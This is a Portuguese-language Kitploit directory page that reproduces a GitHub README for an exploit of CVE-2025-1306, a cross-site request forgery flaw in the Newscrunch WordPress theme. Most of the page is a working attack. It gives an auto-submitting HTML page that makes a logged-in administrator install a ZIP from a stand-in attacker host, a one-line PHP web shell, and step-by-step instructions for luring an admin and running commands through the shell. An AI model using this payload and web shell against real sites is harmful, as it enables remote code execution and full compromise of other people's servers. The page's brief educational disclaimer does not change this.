Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - Falsificação de Solicitação entre Sites para Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-1306
Ferramentas de PhishingGeração de PayloadsExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - Falsificação de Solicitação entre Sites para Upload Arbitrário de Arquivos

Ver Repositório
53há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do Newscrunch (CVE-2025-1306)

🚨 Visão Geral

Este exploit tem como alvo uma vulnerabilidade de Cross-Site Request Forgery (CSRF) para Upload Arbitrário de Arquivos (CVE-2025-1306) no tema Newscrunch para WordPress. Devido à falta de validação de nonce na função newscrunch_install_and_activate_plugin(), um atacante não autenticado pode enganar um administrador logado para fazer upload de arquivos arbitrários no servidor, levando à Execução Remota de Código (RCE).


🔥 Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-1306
  • Software Afetado: Tema Newscrunch WordPress (<= 1.8.4)
  • Classificação CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
  • Pontuação CVSS: 8.8 (ALTA)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Data de Publicação: 4 de março de 2025

🛑 Gravidade e Impacto

  • ✅ Execução Remota de Código (RCE)
  • ✅ Comprometimento Total do Sistema
  • ✅ Upload Arbitrário de Arquivos Baseado em CSRF
  • ✅ Vetor de Ataque Não Autenticado

Explorabilidade: Requer que um administrador visite um link malicioso criado.


📜 Código do Exploit

Este exploit força um administrador autenticado a executar um ataque CSRF que faz upload de um arquivo ZIP malicioso contendo um web shell.

🔹 PoC - Exploit HTML

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 Substitua:

  • http://target.com/ pelo site WordPress vulnerável
  • http://attacker.com/shell.zip por um payload ZIP malicioso contendo um web shell.

🔹 Exemplo de Shell PHP Malicioso

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 Após exploração bem-sucedida, acesse o shell:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 Como Usar

  1. Hospede o arquivo HTML em um site controlado pelo atacante.
  2. Envie o link malicioso para um administrador WordPress autenticado.
  3. Assim que o administrador visitar a página, o shell é enviado automaticamente.
  4. Execute comandos remotamente usando:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e de pesquisa em segurança. A exploração não autorizada de vulnerabilidades é ilegal e punível por lei. O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta. Use com responsabilidade.


Baixar ferramenta